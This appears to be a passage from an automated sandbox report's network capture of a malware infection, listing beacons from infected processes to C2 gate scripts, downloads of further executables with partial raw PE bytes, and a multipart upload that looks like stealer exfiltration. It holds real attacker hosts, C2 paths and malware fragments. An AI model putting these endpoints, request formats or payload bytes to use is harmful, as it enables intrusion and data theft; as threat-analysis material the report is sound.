                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712687969 CET1236INData Raw: 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 52 50 50 51 e8 45 00 00 00 83 c4 10 c3 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 50 52 50 51 e8 2b 00 00 00 83 c4 10 c3 55 8b ec 8b 45 0c 39 45 08 74 18 8b 51 14 83 fa 0f 76 02 8b 09 50 ff 75 08 52 51 e8 07 00
                                                                                                                                                                                                                                                                                        Data Ascii: AQvRPPQEAQvPRPQ+UE9EtQvPuRQ]UUv<=0hAt3MVuAW}F;F;GVPRW_^]UVW3EffxHvQP,_^]UVW3MQf
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712693930 CET1236INData Raw: 5d c2 04 00 6a 20 b8 e9 5b 41 00 e8 87 06 00 00 8b f1 89 75 d4 8b 45 10 8d 4d d8 50 89 75 d4 e8 e2 fb ff ff 83 65 fc 00 8d 45 d8 50 ff 75 0c 8b ce ff 75 08 e8 08 ff ff ff 8d 4d d8 e8 ff fc ff ff c7 06 d0 61 41 00 8b c6 e8 93 06 00 00 c2 0c 00 55
                                                                                                                                                                                                                                                                                        Data Ascii: ]j [AuEMPueEPuuMaAUVuNaA^],AUQuYMP~EUEVtjV;YY^]UQS]Vu;wajX;wSu^VF53;WQPS#NQ
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.712699890 CET108INData Raw: fe ff ff 68 e8 d7 41 00 8d 45 f4 50 e8 b8 10 00 00 cc 55 8b ec 81 ec 24 03 00 00 6a 17 ff 15 10 cd 41 00 85 c0 74 05 6a 02 59 cd 29 a3 00 f3 41 00 89 0d fc f2 41 00 89 15 f8 f2 41 00 89 1d f4 f2 41 00 89 35 f0 f2 41 00 89 3d ec f2 41 00 66 8c 15
                                                                                                                                                                                                                                                                                        Data Ascii: hAEPU$jAtjY)AAAA5A=AfAfAfAfAf
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.832568884 CET1236INData Raw: 8c 25 e0 f2 41 00 66 8c 2d dc f2 41 00 9c 8f 05 10 f3 41 00 8b 45 00 a3 04 f3 41 00 8b 45 04 a3 08 f3 41 00 8d 45 08 a3 14 f3 41 00 8b 85 dc fc ff ff c7 05 50 f2 41 00 01 00 01 00 a1 08 f3 41 00 a3 0c f2 41 00 c7 05 00 f2 41 00 09 04 00 c0 c7 05
                                                                                                                                                                                                                                                                                        Data Ascii: %Af-AAEAEAEAPAAAAAAjXkAjXkALjX@ALhbAUjLAuhAhAPPA]UMdA9t=0gAuA]@]Pd5


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        40192.168.2.1050040185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.271430969 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.392460108 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:15.703794956 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:14 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        41192.168.2.1050041185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:15.926884890 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:16.046869993 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:17.529053926 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:16 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        42192.168.2.105004231.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:17.457714081 CET142OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                                                                                                                        If-None-Match: "67594bc0-b1a00"
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:18.771987915 CET191INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:18 GMT
                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "67594bc0-b1a00"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        43192.168.2.1050043185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:17.771958113 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:17.891832113 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:19.571932077 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:18 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        44192.168.2.1050045185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:19.823246002 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:19.946252108 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:21.667500973 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:20 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        45192.168.2.1050047185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:21.473332882 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 65 30 3d 31 30 31 34 34 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: e0=1014444001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:22.811755896 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:22 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        46192.168.2.1050048185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:21.898684978 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:22.019393921 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:23.477122068 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:22 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        47192.168.2.105004931.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:23.049617052 CET61OUTGET /files/encoxx/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329493999 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:24 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 393728
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675a96d4-60200"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329504013 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05
                                                                                                                                                                                                                                                                                        Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvlll
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329519987 CET1236INData Raw: 6c 05 00 bc 6c 05 00 cc 6c 05 00 e2 6c 05 00 f6 6c 05 00 78 6b 05 00 5c 69 05 00 90 71 05 00 80 6d 05 00 9c 6d 05 00 ba 6d 05 00 cc 6d 05 00 d8 6d 05 00 f0 6d 05 00 08 6e 05 00 1a 6e 05 00 2a 6e 05 00 38 6e 05 00 4a 6e 05 00 62 6e 05 00 76 6e 05
                                                                                                                                                                                                                                                                                        Data Ascii: lllllxk\iqmmmmmmnn*n8nJnbnvnnnnnnnnnoo8oJoXodonoooooooopp&p2p<pHpZpppppppppqq*q<q
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329524994 CET1236INData Raw: 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e
                                                                                                                                                                                                                                                                                        Data Ascii: ndicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtua
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329531908 CET1236INData Raw: 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b
                                                                                                                                                                                                                                                                                        Data Ascii: *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~=EEE00P('8PW700PP (`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetL
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329538107 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: h(((( H
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329632044 CET1236INData Raw: 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee
                                                                                                                                                                                                                                                                                        Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329698086 CET1236INData Raw: 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00
                                                                                                                                                                                                                                                                                        Data Ascii: '`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vec
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329705000 CET1236INData Raw: 00 00 00 60 2b 40 00 58 2b 40 00 4c 2b 40 00 40 2b 40 00 34 2b 40 00 28 2b 40 00 1c 2b 40 00 14 2b 40 00 08 2b 40 00 fc 2a 40 00 aa 1a 40 00 40 26 40 00 24 26 40 00 10 26 40 00 f0 25 40 00 d4 25 40 00 f4 2a 40 00 ec 2a 40 00 a8 1a 40 00 e8 2a 40
                                                                                                                                                                                                                                                                                        Data Ascii: `+@X+@L+@@+@4+@(+@+@+@+@*@@@&@$&@&@%@%@*@*@@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@|*@x*@t*@p*@l*@h*@d*@`*@\*@X*@T*@P*@L*@@*@4*@,*@
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.329785109 CET1236INData Raw: 8b ec b8 f8 15 00 00 e8 c3 ce 00 00 8b 45 08 8b 08 8b 50 04 a1 18 94 45 00 53 56 89 4d f4 8b 0d 1c 94 45 00 89 45 d4 57 8d 45 ec 89 55 e8 c7 45 ec 00 00 00 00 89 4d e0 e8 b2 ff ff ff 81 45 ec 3f 02 00 00 83 3d ec 0b 46 00 14 75 11 6a 00 6a 00 8d
                                                                                                                                                                                                                                                                                        Data Ascii: EPESVMEEWEUEME?=FujjRL@ E$E=4@@EME EEuFu=uF@.=ujj@xFUEEEUU3=FF
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:24.449625969 CET1236INData Raw: f7 ff ff 51 8d 55 e0 52 8d 45 dc 50 8d 4d e8 51 6a 00 8d 95 c0 ef ff ff 52 6a 00 ff 15 b8 10 40 00 8d 45 ec 50 6a 00 8d 4d c8 51 6a 00 ff 15 1c 10 40 00 46 3b 35 ec 0b 46 00 72 82 33 db 8b 3d 60 10 40 00 33 f6 8b 15 ec 0b 46 00 03 d6 81 fa 8d 00
                                                                                                                                                                                                                                                                                        Data Ascii: QUREPMQjRj@EPjMQj@F;5Fr3=`@3Fu$SPSSSSSSMQ@UR@F|=@3,}Bq F}|3l@au]E4HE|FFt|5P@=@T@E{=F


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        48192.168.2.1050050185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:23.827074051 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:23.947453022 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.490935087 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:24 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        49192.168.2.1050055185.215.113.206807020C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.705972910 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="file"------IIJEBFCFIJJJEBGDBAKE--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:27.517986059 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:26 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        50192.168.2.1050060185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.721683025 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:25.845097065 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:27.321105003 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:26 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
